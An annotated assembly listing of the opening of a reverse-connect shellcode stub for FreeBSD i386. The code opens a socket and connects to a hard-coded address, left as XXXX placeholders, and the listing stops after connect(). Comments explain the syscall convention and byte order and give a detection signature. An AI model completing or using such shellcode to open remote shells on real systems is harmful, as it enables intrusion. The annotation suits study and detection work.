.globl main
main:
# Reverse-connect stub, FreeBSD i386, GAS/AT&T syntax: socket() followed by
# connect() to a hard-coded address.  The address and port immediates are
# left as XXXX placeholders, so this listing does not assemble as-is.  The
# listing ends right after connect(); whatever follows is not shown here.
#
# FreeBSD int $0x80 convention: syscall number in %eax, arguments on the
# stack in C order (first argument at the lowest address), plus one extra
# dummy dword pushed last to occupy the return-address slot.  Neither
# syscall result is checked below (FreeBSD reports failure via CF), so a
# failed socket() would feed whatever is in %eax into connect().
#
# Detection note: socket(PF_INET, SOCK_STREAM) immediately followed by
# connect() to a literal, unresolved IP with a stack-built sockaddr_in is
# the behavioural signature of this stub.

# Initialise: zero the four working registers.
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx

# socket(PF_INET, SOCK_STREAM, 0)  ==  socket(2, 1, 0)
# Pushed last-argument-first: protocol=0, type=1, domain=2.
push %edx
inc %edx
push %edx
inc %edx
push %edx
mov $0x61, %al                  # 0x61 = 97 = socket on FreeBSD; %eax upper bytes are 0
push %eax                       # dummy return-address slot required by the BSD convention
int $0x80                       # %eax = new socket fd (the connect comment below assumes 3)

# Build struct sockaddr_in on the stack (8 bytes pushed: addr, port, len+family).
# sockaddr_in fields are stored in network byte order; the original comments
# note that the immediates below must therefore be written "little-endian",
# i.e. byte-reversed relative to the human-readable form.
# sin_addr placeholder (original: "IP address, little-endian")
push $0xXXXXXXXX
# sin_port placeholder (original: "port, little-endian")
pushw $0xXXXX
pushw $0x02AA                   # bytes in memory: sin_len=0xAA, sin_family=0x02 (AF_INET)
                                # sin_len is presumably ignored in favour of the explicit
                                # length argument — not verified here
mov %esp, %ebx                  # %ebx = &sockaddr_in

# connect(sockfd, &sockaddr_in, 16)
# original: connect(3, { AF_INET XXX.XXX.XXX.XXX:XX }, 16)
mov $0x10, %cl                  # %ecx = sizeof(struct sockaddr_in) = 16; upper bytes still 0
push %ecx                       # addrlen
push %ebx                       # addr
push %eax                       # sockfd: %eax still holds socket()'s return value
mov $0x62, %al                  # 0x62 = 98 = connect on FreeBSD; only the low byte is
                                # overwritten, so this relies on the fd being < 256
push %eax                       # dummy return-address slot
int $0x80                       # result not checked